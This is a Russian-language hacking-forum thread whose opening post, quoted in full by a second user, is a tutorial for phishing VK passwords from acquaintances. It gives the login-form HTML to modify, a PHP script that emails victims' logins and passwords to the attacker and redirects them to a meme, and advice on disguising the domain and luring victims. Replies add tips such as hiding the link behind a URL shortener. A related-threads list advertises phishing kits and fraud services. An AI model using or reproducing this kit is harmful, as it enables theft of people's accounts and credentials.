Фишинг для самых маленьких

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("[email protected]" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
 
B

BonviP

Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("[email protected]" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
нАДО ПОПРОБОВАТЬ)
 
D

demasssu

сенкс автору за подобное. лови лайлайклайк
 
S

shamoon

годно)
зарегал домен в ру зоне за сотку, и через сокращатор vk-шный норм скармливается, почти не заметно после перехода подвоха
Посмотреть вложение 5251
 
A

AlexMall

Уже есть сайты с готовыми фейк-ссылками. Создавать свои нет смысла
 
N

nictic123

У меня такие ссылки за пол дня банили))
 
M

morpexbro

а что делать если код html вк? где-то часть кода в html есть, а в примере нету. что с ними делать? изменять?
 
Название темы
Автор Заголовок Раздел Ответы Дата
A Фишинг-сайты (забираем карту и все данные владельца) и сайты для инсталлов. Ищу работу. Предлагаю свои услуги. 0
J Фишинг панель для взлома соц.сетей и почт СИ/Фишинг/Мошенничество 13
Support81 Фишинг-кит CryptoChameleon ориентирован на пользователей мобильных устройств Новости в сети 0
Support81 Фишинг, достойный адвоката: Scaly Wolf атакует российские компании юридически безупречными письмами Новости в сети 0
S Фишинг Вопросы и интересы 3
S1leNt Фишинг-Сценарии (465 шт) СИ/Фишинг/Мошенничество 2
Eteriass Фишинг на Kali linux/Shellphish/ СИ/Фишинг/Мошенничество 17
X /HumenError/Фишинг instagram/Kali linux/ СИ/Фишинг/Мошенничество 10
K Фишинг токенов Qiwi СИ/Фишинг/Мошенничество 1
K Фишинг скрипт(Раздача голосов, стикеров и т.п.) СИ/Фишинг/Мошенничество 2
S Фишинг(фэйк) Hydra СИ/Фишинг/Мошенничество 0
S Взлом социальных сетей через локалку на андроиде (Фишинг) СИ/Фишинг/Мошенничество 7
F Фишинг ВК скрипт / "Накрутка лайков" Способы заработка 3
F Фишинг ВК Способы заработка 6
J Фишинг пак СИ/Фишинг/Мошенничество 0
G Фишинг Полезные статьи 0
Admin Psw adm, Соц. инжинерия, Фишинг, Drive-by Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Фишинг вк [С отправкой лога и пароля вам в личные сообщения] Другое 8
Emilio_Gaviriya Статья Censys: Поисковик для кибербезопасности в интернете. Уязвимости и взлом 0
Emilio_Gaviriya Статья AlienVault: Всё, что вам нужно знать о платформе для обнаружения угроз. Уязвимости и взлом 0
Emilio_Gaviriya OSINT: Подборка инструментов для автоматизации разведки. Статьи 0
Support81 VPN – ловушка для Android: как приложения превращают смартфоны в зомби Новости в сети 0
Support81 Токены Discord нарасхват: взлом Top.gg обернулся кошмаром для разработчиков Новости в сети 0
Emilio_Gaviriya Статья Платформы для проверки и улучшения навыков белого хакинга. Уязвимости и взлом 0
Emilio_Gaviriya Статья Инструмент для сбора whois-истории. Уязвимости и взлом 0
Support81 82 участника, 1,3 миллиарда и...отсрочка: что происходит с российской платформой для обмена кодом Новости в сети 0
Support81 DarkGPT: незаменимый OSINT-инструмент для специалистов в сфере кибербезопасности Новости в сети 0
Support81 StopCrypt: вымогатель для простых смертных обзавёлся мантией-невидимкой Новости в сети 0
M Работа для соискателей из РФ и РБ. Предоставляю работу. Ищу специалиста. 1
G Нужны толковые ребята для работы Ищу работу. Предлагаю свои услуги. 0
Emilio_Gaviriya Статья Инструменты для исследования вредоносного ПО. Вирусология 0
Support81 WogRAT злоупотребляет сервисом для заметок aNotepad Новости в сети 0
Emilio_Gaviriya Статья Полезные дополнения для пентеста. Уязвимости и взлом 0
Support81 Наказание для Минобороны: как Великобритания «помогла» афганским беженцам скрыться от талибов Новости в сети 0
Black_ppss ⭐ Поиск людей для работы с команде! Вещевой карж по EU! Предоставляю работу. Ищу специалиста. 1
D Подработка для всех! Предоставляю работу. Ищу специалиста. 0
Support81 Троян GoldPickaxe крадет лица владельцев iPhone для доступа к банковским счетам Новости в сети 0
Support81 92% атак по email: электронная почта остается главной лазейкой для фишеров Новости в сети 0
Support81 ЦБ объявил войну кредитным мошенникам: что изменится для банков и клиентов Новости в сети 0
Emilio_Gaviriya Статья Почему стоит избегать использования ботов для поиска персональных данных: Опасности и риски. Анонимность и приватность 0
Support81 Специалисты по кибербезопасности назвали главную угрозу для компаний в 2024 году Новости в сети 0
Bogalski Ищу напарника для совместной работы | С обучением | Предоставляю работу. Ищу специалиста. 1
Easy_AI Ожидает оплаты Нейрокомментинг | Автокомментинг| Софт для продвижения в Telegram Продажа софта 0
Ёшкин_кот Сервис для создания фейковой переписки в соцсетях. Полезные статьи 3
Support81 Просчитались, но где? Заказ на убийство в зашифрованном чате обернулся для бандитов тюрьмой Новости в сети 0
whitepagessupp Продавец Генератор White Pages для залива трафика - 1.30$ за 1 вайт Трафик, загрузки, инсталлы, iframe 0
Support81 Мошенники в мессенджерах подделывают голоса руководителей для авторизации перевода средств Новости в сети 0
lampeduza Продам Продам базу для привлечения траффика $ в ваш проект. Куплю/Продам 0
Emilio_Gaviriya Статья Анонимность для чайников. Анонимность и приватность 0
Ёшкин_кот Интересно Сервис для посещения заблокированных интернет ресурсов без VPN. Полезные статьи 0

Название темы